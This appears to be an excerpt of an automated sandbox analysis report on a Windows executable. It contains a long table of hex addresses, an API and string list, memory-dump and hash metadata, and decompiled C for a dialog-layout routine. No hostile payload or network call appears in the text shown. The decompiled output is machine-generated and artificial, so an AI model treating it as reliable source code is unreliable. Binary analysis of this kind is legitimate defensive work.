                                                                                                                0x00ed1147
                                                                                                                0x00000000
                                                                                                                0x00ed1149
                                                                                                                0x00000000
                                                                                                                0x00ed1149
                                                                                                                0x00ed1147
                                                                                                                0x00ed1151
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1157
                                                                                                                0x00000000
                                                                                                                0x00ed115e
                                                                                                                0x00ed1161
                                                                                                                0x00ed1174
                                                                                                                0x00ed119a
                                                                                                                0x00ed11ae
                                                                                                                0x00ed11b1
                                                                                                                0x00ed11bc
                                                                                                                0x00ed1300
                                                                                                                0x00ed1300
                                                                                                                0x00ed1308
                                                                                                                0x00ed130e
                                                                                                                0x00ed1313
                                                                                                                0x00ed1315
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed11ce
                                                                                                                0x00ed11d4
                                                                                                                0x00ed11da
                                                                                                                0x00ed1280
                                                                                                                0x00ed1287
                                                                                                                0x00ed128d
                                                                                                                0x00ed1290
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1299
                                                                                                                0x00ed129f
                                                                                                                0x00ed12a1
                                                                                                                0x00000000
                                                                                                                0x00ed12a3
                                                                                                                0x00ed12a3
                                                                                                                0x00ed12a5
                                                                                                                0x00ed12a6
                                                                                                                0x00ed12aa
                                                                                                                0x00ed12be
                                                                                                                0x00ed12c3
                                                                                                                0x00ed12cd
                                                                                                                0x00ed12d3
                                                                                                                0x00ed12d6
                                                                                                                0x00ed12a8
                                                                                                                0x00ed12a8
                                                                                                                0x00ed12a9
                                                                                                                0x00000000
                                                                                                                0x00ed12d8
                                                                                                                0x00ed12e6
                                                                                                                0x00ed12ec
                                                                                                                0x00ed12ee
                                                                                                                0x00ed12fa
                                                                                                                0x00ed12fa
                                                                                                                0x00000000
                                                                                                                0x00ed12ee
                                                                                                                0x00ed12d6
                                                                                                                0x00ed12a1
                                                                                                                0x00ed11ef
                                                                                                                0x00ed11fc
                                                                                                                0x00ed120d
                                                                                                                0x00ed1210
                                                                                                                0x00ed1213
                                                                                                                0x00ed1226
                                                                                                                0x00ed122d
                                                                                                                0x00ed1232
                                                                                                                0x00ed1234
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed123a
                                                                                                                0x00ed1241
                                                                                                                0x00ed1246
                                                                                                                0x00ed124b
                                                                                                                0x00ed1257
                                                                                                                0x00ed125c
                                                                                                                0x00ed125f
                                                                                                                0x00ed1266
                                                                                                                0x00ed1268
                                                                                                                0x00ed1269
                                                                                                                0x00ed1273
                                                                                                                0x00ed1279
                                                                                                                0x00ed127a
                                                                                                                0x00000000
                                                                                                                0x00ed127a
                                                                                                                0x00ed121c
                                                                                                                0x00ed1222
                                                                                                                0x00ed1224
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1224
                                                                                                                0x00ed131b
                                                                                                                0x00ed1325
                                                                                                                0x00ed1325
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed132f
                                                                                                                0x00ed1331
                                                                                                                0x00000000
                                                                                                                0x00ed1337
                                                                                                                0x00ed1337
                                                                                                                0x00ed133c
                                                                                                                0x00ed133e
                                                                                                                0x00ed1341
                                                                                                                0x00ed1343
                                                                                                                0x00ed1350
                                                                                                                0x00ed1355
                                                                                                                0x00ed1356
                                                                                                                0x00ed1356
                                                                                                                0x00ed1357
                                                                                                                0x00ed135a
                                                                                                                0x00ed135c
                                                                                                                0x00ed1366
                                                                                                                0x00ed1369
                                                                                                                0x00ed136f
                                                                                                                0x00ed1371
                                                                                                                0x00ed135e
                                                                                                                0x00ed135e
                                                                                                                0x00ed135e
                                                                                                                0x00ed1376
                                                                                                                0x00ed1378
                                                                                                                0x00ed1381
                                                                                                                0x00ed1381
                                                                                                                0x00ed1384
                                                                                                                0x00ed1389
                                                                                                                0x00ed1392
                                                                                                                0x00ed1393
                                                                                                                0x00ed1399
                                                                                                                0x00ed139e
                                                                                                                0x00ed13a1
                                                                                                                0x00ed13a3
                                                                                                                0x00ed13bc
                                                                                                                0x00ed13bc
                                                                                                                0x00ed13be
                                                                                                                0x00ed13c5
                                                                                                                0x00ed13ca
                                                                                                                0x00000000
                                                                                                                0x00ed13be
                                                                                                                0x00ed13a5
                                                                                                                0x00ed13aa
                                                                                                                0x00ed13ac
                                                                                                                0x00ed13ae
                                                                                                                0x00ed13ae
                                                                                                                0x00ed13b0
                                                                                                                0x00ed13b0
                                                                                                                0x00ed13b5
                                                                                                                0x00ed13ba
                                                                                                                0x00ed13bb
                                                                                                                0x00000000
                                                                                                                0x00ed13bb
                                                                                                                0x00000000
                                                                                                                0x00ed13d0
                                                                                                                0x00ed13d2
                                                                                                                0x00ed13e2
                                                                                                                0x00ed13e2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed13ed
                                                                                                                0x00ed13ef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed13f5
                                                                                                                0x00ed13fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1402
                                                                                                                0x00ed1404
                                                                                                                0x00ed140a
                                                                                                                0x00ed140c
                                                                                                                0x00ed1413
                                                                                                                0x00ed1414
                                                                                                                0x00ed141b
                                                                                                                0x00ed141d
                                                                                                                0x00ed141d
                                                                                                                0x00ed1424
                                                                                                                0x00ed1429
                                                                                                                0x00ed142f
                                                                                                                0x00ed1431
                                                                                                                0x00000000
                                                                                                                0x00ed1437
                                                                                                                0x00ed1437
                                                                                                                0x00ed143a
                                                                                                                0x00ed143c
                                                                                                                0x00ed143d
                                                                                                                0x00ed1440
                                                                                                                0x00ed1469
                                                                                                                0x00ed1469
                                                                                                                0x00ed146c
                                                                                                                0x00ed1551
                                                                                                                0x00ed155a
                                                                                                                0x00ed155f
                                                                                                                0x00ed155f
                                                                                                                0x00ed1561
                                                                                                                0x00ed1561
                                                                                                                0x00ed1563
                                                                                                                0x00ed1565
                                                                                                                0x00ed156c
                                                                                                                0x00ed1571
                                                                                                                0x00ed1572
                                                                                                                0x00ed1573
                                                                                                                0x00ed1575
                                                                                                                0x00ed1577
                                                                                                                0x00ed157b
                                                                                                                0x00ed157d
                                                                                                                0x00ed157d
                                                                                                                0x00ed157f
                                                                                                                0x00ed157f
                                                                                                                0x00ed157b
                                                                                                                0x00ed1583
                                                                                                                0x00ed1589
                                                                                                                0x00ed1596
                                                                                                                0x00ed159d
                                                                                                                0x00ed15ad
                                                                                                                0x00ed15b7
                                                                                                                0x00ed15c5
                                                                                                                0x00ed15cb
                                                                                                                0x00ed15d3
                                                                                                                0x00ed15d8
                                                                                                                0x00ed15d9
                                                                                                                0x00ed15da
                                                                                                                0x00ed15dc
                                                                                                                0x00ed15f0
                                                                                                                0x00ed15f0
                                                                                                                0x00000000
                                                                                                                0x00ed15dc
                                                                                                                0x00ed1472
                                                                                                                0x00ed1475
                                                                                                                0x00ed1482
                                                                                                                0x00ed1482
                                                                                                                0x00ed1485
                                                                                                                0x00ed1487
                                                                                                                0x00ed1488
                                                                                                                0x00ed148a
                                                                                                                0x00ed148b
                                                                                                                0x00ed1490
                                                                                                                0x00ed1495
                                                                                                                0x00ed149b
                                                                                                                0x00ed149d
                                                                                                                0x00ed149f
                                                                                                                0x00ed14a2
                                                                                                                0x00ed14a9
                                                                                                                0x00ed14aa
                                                                                                                0x00ed14b0
                                                                                                                0x00ed14b1
                                                                                                                0x00ed14b4
                                                                                                                0x00ed14b5
                                                                                                                0x00ed14b6
                                                                                                                0x00ed14bb
                                                                                                                0x00ed14be
                                                                                                                0x00ed14c4
                                                                                                                0x00ed14cd
                                                                                                                0x00ed14d0
                                                                                                                0x00ed14d5
                                                                                                                0x00ed14d7
                                                                                                                0x00ed14d9
                                                                                                                0x00ed14db
                                                                                                                0x00ed14db
                                                                                                                0x00ed14dd
                                                                                                                0x00ed14dd
                                                                                                                0x00ed14df
                                                                                                                0x00ed14df
                                                                                                                0x00ed14e7
                                                                                                                0x00ed14ee
                                                                                                                0x00ed14f0
                                                                                                                0x00ed14f7
                                                                                                                0x00ed14fd
                                                                                                                0x00ed14ff
                                                                                                                0x00ed1500
                                                                                                                0x00ed1508
                                                                                                                0x00ed1517
                                                                                                                0x00ed1517
                                                                                                                0x00ed1508
                                                                                                                0x00ed1522
                                                                                                                0x00ed1524
                                                                                                                0x00ed1533
                                                                                                                0x00ed1539
                                                                                                                0x00ed153f
                                                                                                                0x00ed154a
                                                                                                                0x00ed154a
                                                                                                                0x00000000
                                                                                                                0x00ed153f
                                                                                                                0x00ed1477
                                                                                                                0x00ed147c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed147c
                                                                                                                0x00ed1442
                                                                                                                0x00ed1446
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1448
                                                                                                                0x00ed144b
                                                                                                                0x00ed144d
                                                                                                                0x00ed1450
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed145f
                                                                                                                0x00000000
                                                                                                                0x00ed145f
                                                                                                                0x00000000
                                                                                                                0x00ed15fb
                                                                                                                0x00ed15fc
                                                                                                                0x00ed1601
                                                                                                                0x00ed1603
                                                                                                                0x00ed1606
                                                                                                                0x00ed1606
                                                                                                                0x00000000
                                                                                                                0x00ed163c
                                                                                                                0x00ed1643
                                                                                                                0x00ed1645
                                                                                                                0x00ed1645
                                                                                                                0x00ed1647
                                                                                                                0x00ed1676
                                                                                                                0x00ed1676
                                                                                                                0x00ed167c
                                                                                                                0x00000000
                                                                                                                0x00ed167c
                                                                                                                0x00ed1649
                                                                                                                0x00ed1649
                                                                                                                0x00ed164c
                                                                                                                0x00ed1665
                                                                                                                0x00ed166b
                                                                                                                0x00ed166b
                                                                                                                0x00000000
                                                                                                                0x00ed166b
                                                                                                                0x00ed164e
                                                                                                                0x00ed164e
                                                                                                                0x00ed1651
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1653
                                                                                                                0x00ed1653
                                                                                                                0x00ed1656
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed165c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed16c9
                                                                                                                0x00ed16cc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed16ce
                                                                                                                0x00ed16da
                                                                                                                0x00ed16df
                                                                                                                0x00ed16e0
                                                                                                                0x00ed16e1
                                                                                                                0x00ed16e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed16e5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed172b
                                                                                                                0x00ed172e
                                                                                                                0x00ed18af
                                                                                                                0x00ed18af
                                                                                                                0x00ed18b2
                                                                                                                0x00ed18b8
                                                                                                                0x00ed18bf
                                                                                                                0x00ed18c1
                                                                                                                0x00ed18c1
                                                                                                                0x00ed18cb
                                                                                                                0x00ed18cb
                                                                                                                0x00000000
                                                                                                                0x00ed18b2
                                                                                                                0x00ed1734
                                                                                                                0x00ed173a
                                                                                                                0x00ed1741
                                                                                                                0x00ed174f
                                                                                                                0x00ed1754
                                                                                                                0x00ed1756
                                                                                                                0x00ed1758
                                                                                                                0x00ed175d
                                                                                                                0x00ed175d
                                                                                                                0x00ed1775
                                                                                                                0x00ed1782
                                                                                                                0x00ed1787
                                                                                                                0x00ed1789
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed175b
                                                                                                                0x00ed175b
                                                                                                                0x00ed175c
                                                                                                                0x00ed175c
                                                                                                                0x00ed1795
                                                                                                                0x00ed179b
                                                                                                                0x00ed17a3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed17a9
                                                                                                                0x00ed17b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed17b6
                                                                                                                0x00ed17b8
                                                                                                                0x00ed17bf
                                                                                                                0x00ed17c5
                                                                                                                0x00ed17c7
                                                                                                                0x00ed17c8
                                                                                                                0x00ed17cd
                                                                                                                0x00ed17ce
                                                                                                                0x00ed17cf
                                                                                                                0x00ed17d1
                                                                                                                0x00ed1825
                                                                                                                0x00ed1825
                                                                                                                0x00ed182d
                                                                                                                0x00ed183b
                                                                                                                0x00ed184c
                                                                                                                0x00ed185a
                                                                                                                0x00ed185a
                                                                                                                0x00ed1866
                                                                                                                0x00ed186b
                                                                                                                0x00ed186d
                                                                                                                0x00ed187d
                                                                                                                0x00ed1887
                                                                                                                0x00ed188c
                                                                                                                0x00ed188f
                                                                                                                0x00000000
                                                                                                                0x00ed1895
                                                                                                                0x00ed1895
                                                                                                                0x00ed1897
                                                                                                                0x00ed189a
                                                                                                                0x00ed189a
                                                                                                                0x00ed189c
                                                                                                                0x00ed18a3
                                                                                                                0x00ed18a9
                                                                                                                0x00000000
                                                                                                                0x00ed18a9
                                                                                                                0x00ed188f
                                                                                                                0x00ed17d3
                                                                                                                0x00ed17d5
                                                                                                                0x00ed17d7
                                                                                                                0x00ed17de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed17e0
                                                                                                                0x00ed17e2
                                                                                                                0x00ed17e8
                                                                                                                0x00ed17e8
                                                                                                                0x00ed17ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed17ee
                                                                                                                0x00ed17ef
                                                                                                                0x00ed17f5
                                                                                                                0x00ed17f8
                                                                                                                0x00ed17fa
                                                                                                                0x00ed17fd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed17ff
                                                                                                                0x00ed180c
                                                                                                                0x00ed1816
                                                                                                                0x00ed181b
                                                                                                                0x00ed181b
                                                                                                                0x00ed181d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed18d7
                                                                                                                0x00ed18da
                                                                                                                0x00ed18dc
                                                                                                                0x00ed18e3
                                                                                                                0x00ed18e5
                                                                                                                0x00ed18eb
                                                                                                                0x00ed18ec
                                                                                                                0x00ed18f1
                                                                                                                0x00ed18f2
                                                                                                                0x00ed18f2
                                                                                                                0x00ed18f7
                                                                                                                0x00ed18fa
                                                                                                                0x00ed1900
                                                                                                                0x00ed1900
                                                                                                                0x00ed1905
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1911
                                                                                                                0x00ed1914
                                                                                                                0x00ed16f5
                                                                                                                0x00ed16f5
                                                                                                                0x00000000
                                                                                                                0x00ed16f5
                                                                                                                0x00ed191a
                                                                                                                0x00ed16e6
                                                                                                                0x00ed16e6
                                                                                                                0x00ed16ec
                                                                                                                0x00ed16ed
                                                                                                                0x00ed16f0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1921
                                                                                                                0x00ed1924
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed192a
                                                                                                                0x00ed192c
                                                                                                                0x00ed1933
                                                                                                                0x00ed193b
                                                                                                                0x00ed1941
                                                                                                                0x00ed1946
                                                                                                                0x00ed1949
                                                                                                                0x00ed197e
                                                                                                                0x00ed1983
                                                                                                                0x00ed1989
                                                                                                                0x00ed198a
                                                                                                                0x00ed198f
                                                                                                                0x00ed194b
                                                                                                                0x00ed194b
                                                                                                                0x00ed194e
                                                                                                                0x00ed1954
                                                                                                                0x00ed196a
                                                                                                                0x00ed196f
                                                                                                                0x00ed1970
                                                                                                                0x00ed1975
                                                                                                                0x00ed1956
                                                                                                                0x00ed1956
                                                                                                                0x00ed195b
                                                                                                                0x00ed195c
                                                                                                                0x00ed1961
                                                                                                                0x00ed1961
                                                                                                                0x00ed1954
                                                                                                                0x00ed1996
                                                                                                                0x00ed1998
                                                                                                                0x00ed199f
                                                                                                                0x00ed19ad
                                                                                                                0x00ed19b4
                                                                                                                0x00ed19b9
                                                                                                                0x00ed19ba
                                                                                                                0x00ed19bb
                                                                                                                0x00ed19bd
                                                                                                                0x00ed19be
                                                                                                                0x00ed19c5
                                                                                                                0x00ed1a15
                                                                                                                0x00ed1a1a
                                                                                                                0x00ed1a1c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1a22
                                                                                                                0x00ed1a24
                                                                                                                0x00ed1a2a
                                                                                                                0x00ed1a31
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1a33
                                                                                                                0x00ed1a35
                                                                                                                0x00ed1a36
                                                                                                                0x00ed1a36
                                                                                                                0x00ed1a39
                                                                                                                0x00ed1a3c
                                                                                                                0x00ed1a46
                                                                                                                0x00ed1a46
                                                                                                                0x00ed1a48
                                                                                                                0x00ed1a4a
                                                                                                                0x00ed1a54
                                                                                                                0x00ed1a59
                                                                                                                0x00ed1a5b
                                                                                                                0x00ed1a99
                                                                                                                0x00ed1a9c
                                                                                                                0x00ed1a9c
                                                                                                                0x00ed1a9e
                                                                                                                0x00ed1a9f
                                                                                                                0x00ed1a9f
                                                                                                                0x00000000
                                                                                                                0x00ed1a9f
                                                                                                                0x00ed1a5d
                                                                                                                0x00ed1a5f
                                                                                                                0x00ed1a60
                                                                                                                0x00ed1a62
                                                                                                                0x00ed1a65
                                                                                                                0x00ed1a7a
                                                                                                                0x00ed1a7c
                                                                                                                0x00ed1a7d
                                                                                                                0x00ed1a7d
                                                                                                                0x00ed1a80
                                                                                                                0x00ed1a80
                                                                                                                0x00ed1a85
                                                                                                                0x00ed1a86
                                                                                                                0x00ed1a8c
                                                                                                                0x00ed1a8c
                                                                                                                0x00ed1a8d
                                                                                                                0x00ed1a92
                                                                                                                0x00ed1a93
                                                                                                                0x00ed1a94
                                                                                                                0x00000000
                                                                                                                0x00ed1a94
                                                                                                                0x00ed1a67
                                                                                                                0x00ed1a6e
                                                                                                                0x00ed1a71
                                                                                                                0x00ed1a72
                                                                                                                0x00000000
                                                                                                                0x00ed1a72
                                                                                                                0x00ed1a3e
                                                                                                                0x00ed1a40
                                                                                                                0x00ed1a41
                                                                                                                0x00ed1a44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1aa1
                                                                                                                0x00ed1aa1
                                                                                                                0x00ed1aa4
                                                                                                                0x00ed1aa4
                                                                                                                0x00ed1aa9
                                                                                                                0x00ed1aab
                                                                                                                0x00ed1aad
                                                                                                                0x00ed1aad
                                                                                                                0x00ed1aaf
                                                                                                                0x00ed1aaf
                                                                                                                0x00000000
                                                                                                                0x00ed19c7
                                                                                                                0x00ed19ce
                                                                                                                0x00ed19da
                                                                                                                0x00ed19e0
                                                                                                                0x00ed19e1
                                                                                                                0x00ed19e2
                                                                                                                0x00ed19e7
                                                                                                                0x00ed19ea
                                                                                                                0x00ed19ec
                                                                                                                0x00ed19f2
                                                                                                                0x00ed19f4
                                                                                                                0x00ed1a02
                                                                                                                0x00ed1a07
                                                                                                                0x00ed1a08
                                                                                                                0x00ed1a08
                                                                                                                0x00ed1ab2
                                                                                                                0x00ed1ab2
                                                                                                                0x00ed1aba
                                                                                                                0x00ed1abf
                                                                                                                0x00ed1ac9
                                                                                                                0x00ed1ad0
                                                                                                                0x00ed1ad0
                                                                                                                0x00ed1add
                                                                                                                0x00ed1ae4
                                                                                                                0x00ed1ae9
                                                                                                                0x00ed1af1
                                                                                                                0x00ed1afd
                                                                                                                0x00ed1afd
                                                                                                                0x00ed1b0a
                                                                                                                0x00ed1b0f
                                                                                                                0x00ed1b17
                                                                                                                0x00ed1b21
                                                                                                                0x00ed1b2e
                                                                                                                0x00ed1b35
                                                                                                                0x00ed1b35
                                                                                                                0x00ed1b41
                                                                                                                0x00ed1b48
                                                                                                                0x00ed1b4d
                                                                                                                0x00ed1b55
                                                                                                                0x00ed1b5b
                                                                                                                0x00ed1b5c
                                                                                                                0x00ed1b5d
                                                                                                                0x00ed1b5f
                                                                                                                0x00ed1b5f
                                                                                                                0x00ed1b74
                                                                                                                0x00ed1b79
                                                                                                                0x00ed1b85
                                                                                                                0x00ed1b87
                                                                                                                0x00ed1b98
                                                                                                                0x00ed1ba5
                                                                                                                0x00000000
                                                                                                                0x00ed1b89
                                                                                                                0x00ed1b94
                                                                                                                0x00ed1b96
                                                                                                                0x00ed1baa
                                                                                                                0x00ed1baa
                                                                                                                0x00ed1bac
                                                                                                                0x00ed1bb2
                                                                                                                0x00ed1bb8
                                                                                                                0x00ed1bc6
                                                                                                                0x00ed1bcb
                                                                                                                0x00ed1bcc
                                                                                                                0x00ed1bd4
                                                                                                                0x00ed1bd9
                                                                                                                0x00ed1be0
                                                                                                                0x00ed1be6
                                                                                                                0x00ed1be8
                                                                                                                0x00ed1bee
                                                                                                                0x00ed1bf4
                                                                                                                0x00ed1bf6
                                                                                                                0x00ed1bff
                                                                                                                0x00ed1c02
                                                                                                                0x00ed1c04
                                                                                                                0x00ed1c0d
                                                                                                                0x00ed1c10
                                                                                                                0x00ed1c16
                                                                                                                0x00ed1c19
                                                                                                                0x00ed1c22
                                                                                                                0x00ed1c31
                                                                                                                0x00ed1c36
                                                                                                                0x00ed1c3e
                                                                                                                0x00ed1c40
                                                                                                                0x00ed1c41
                                                                                                                0x00ed1c47
                                                                                                                0x00ed1c48
                                                                                                                0x00ed1c4a
                                                                                                                0x00ed1c4f
                                                                                                                0x00ed1c4f
                                                                                                                0x00000000
                                                                                                                0x00ed1c3e
                                                                                                                0x00000000
                                                                                                                0x00ed1b96
                                                                                                                0x00ed1b87
                                                                                                                0x00000000
                                                                                                                0x00ed1c57
                                                                                                                0x00ed1c5a
                                                                                                                0x00ed1c5c
                                                                                                                0x00ed1c5c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1688
                                                                                                                0x00ed1690
                                                                                                                0x00ed1696
                                                                                                                0x00ed1699
                                                                                                                0x00ed16bd
                                                                                                                0x00ed169b
                                                                                                                0x00ed169b
                                                                                                                0x00ed169e
                                                                                                                0x00ed16b1
                                                                                                                0x00ed16a0
                                                                                                                0x00ed16a0
                                                                                                                0x00ed16a2
                                                                                                                0x00ed16a7
                                                                                                                0x00ed16a7
                                                                                                                0x00ed169e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1701
                                                                                                                0x00ed1702
                                                                                                                0x00ed1707
                                                                                                                0x00ed1707
                                                                                                                0x00ed1707
                                                                                                                0x00ed170a
                                                                                                                0x00ed170f
                                                                                                                0x00ed1715
                                                                                                                0x00ed1715
                                                                                                                0x00ed171b
                                                                                                                0x00ed1721
                                                                                                                0x00ed1721
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed1118
                                                                                                                0x00ed111a
                                                                                                                0x00ed111f
                                                                                                                0x00ed1125
                                                                                                                0x00ed1128
                                                                                                                0x00000000
                                                                                                                0x00ed112a
                                                                                                                0x00ed112a
                                                                                                                0x00000000
                                                                                                                0x00ed112a
                                                                                                                0x00ed1c63
                                                                                                                0x00ed1c63
                                                                                                                0x00ed1c68
                                                                                                                0x00ed1c6c
                                                                                                                0x00ed1c70
                                                                                                                0x00ed1c77
                                                                                                                0x00ed1c7e
                                                                                                                0x00ed1c81
                                                                                                                0x00ed1c86
                                                                                                                0x00ed1c89
                                                                                                                0x00ed1c8c
                                                                                                                0x00ed1c96

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00ED10BA
                                                                                                                  • Part of subcall function 00ECFD06: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00ECFDCE
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00ED13E2
                                                                                                                • _wcsrchr.LIBVCRUNTIME ref: 00ED156C
                                                                                                                • GetDlgItem.USER32(?,00000066), ref: 00ED15A7
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00ED15B7
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,00F0EA72), ref: 00ED15C5
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00ED15F0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$,
                                                                                                                • API String ID: 3564274579-3296597912
                                                                                                                • Opcode ID: accaeef70ed03b4b5674f5b8d5e40033e616c785cbdf0249d369180d6b9088b8
                                                                                                                • Instruction ID: dce986d74a1f1da5dc99a5e4ddd40aa9256edaf3cdfbf6b0bcd6e128f8a99141
                                                                                                                • Opcode Fuzzy Hash: accaeef70ed03b4b5674f5b8d5e40033e616c785cbdf0249d369180d6b9088b8
                                                                                                                • Instruction Fuzzy Hash: 81E18672900219BADF24EBA0DE85EEE73BCEB04754F0050A7F519F7151EE749B868B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC4703, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00EC4703(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				struct HWND__* _t107;
				signed int _t120;
				signed int _t135;
				void* _t151;
				void* _t156;
				char _t157;
				void* _t158;
				signed int _t159;
				intOrPtr _t161;
				void* _t164;
				void* _t170;
				long _t171;
				signed int _t175;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;

				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E00EC37E6( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00EC799C( &_v2208,  &_v2288, 0x50);
				_t96 = E00EDA890( &_v2300);
				_t187 = _v8;
				_t156 = 0;
				_v2376 = _t96;
				_t210 =  *0xef14e4 - _t156; // 0x63
				if(_t210 <= 0) {
					L8:
					_t157 = E00EC3D3E(_t156, _t203, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t157;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t170 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t170 - _t179;
					if(_t157 == 0) {
						L15:
						_t222 = _a12;
						if(_a12 == 0 && E00EC3DC1(_t157, _v2368.bottom, _t222, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
						L18:
						_t206 = _t205 - GetSystemMetrics(8);
						_t107 = GetWindow(_t187, 5);
						_t188 = _t107;
						_v2368.bottom = _t188;
						if(_t157 == 0) {
							L24:
							return _t107;
						}
						_t158 = 0;
						while(_t188 != 0) {
							__eflags = _t158 - 0x200;
							if(_t158 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t188,  &_v2320);
							_t171 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t120 = (_t171 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t175 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xf26124(_t188, 0, (_t194 - (_v2352.right - _t120 % _t175 >> 1) - _v2352.bottom) * _v2368.right / _t175, _t120 / _t175, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t171 + 1) * _v2368.top / _t193, 0x204);
							_t107 = GetWindow(_t188, 2);
							_t188 = _t107;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L24;
							}
							_t158 = _t158 + 1;
							__eflags = _t158;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t159 = 0x64;
					asm("cdq");
					_t135 = _v2292 * _v2368.top;
					_t161 = _t179 * _v2368.right / _t159 + _v2352.right;
					_v2324 = _t161;
					asm("cdq");
					_t186 = _t135 % _v2352.top;
					_v2352.left = _t135 / _v2352.top + _t205;
					asm("cdq");
					asm("cdq");
					_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
					_t164 = (_t170 - _t161 - _t186 >> 1) + _v2352.bottom;
					if(_t164 < 0) {
						_t164 = 0;
					}
					if(_t201 < 0) {
						_t201 = 0;
					}
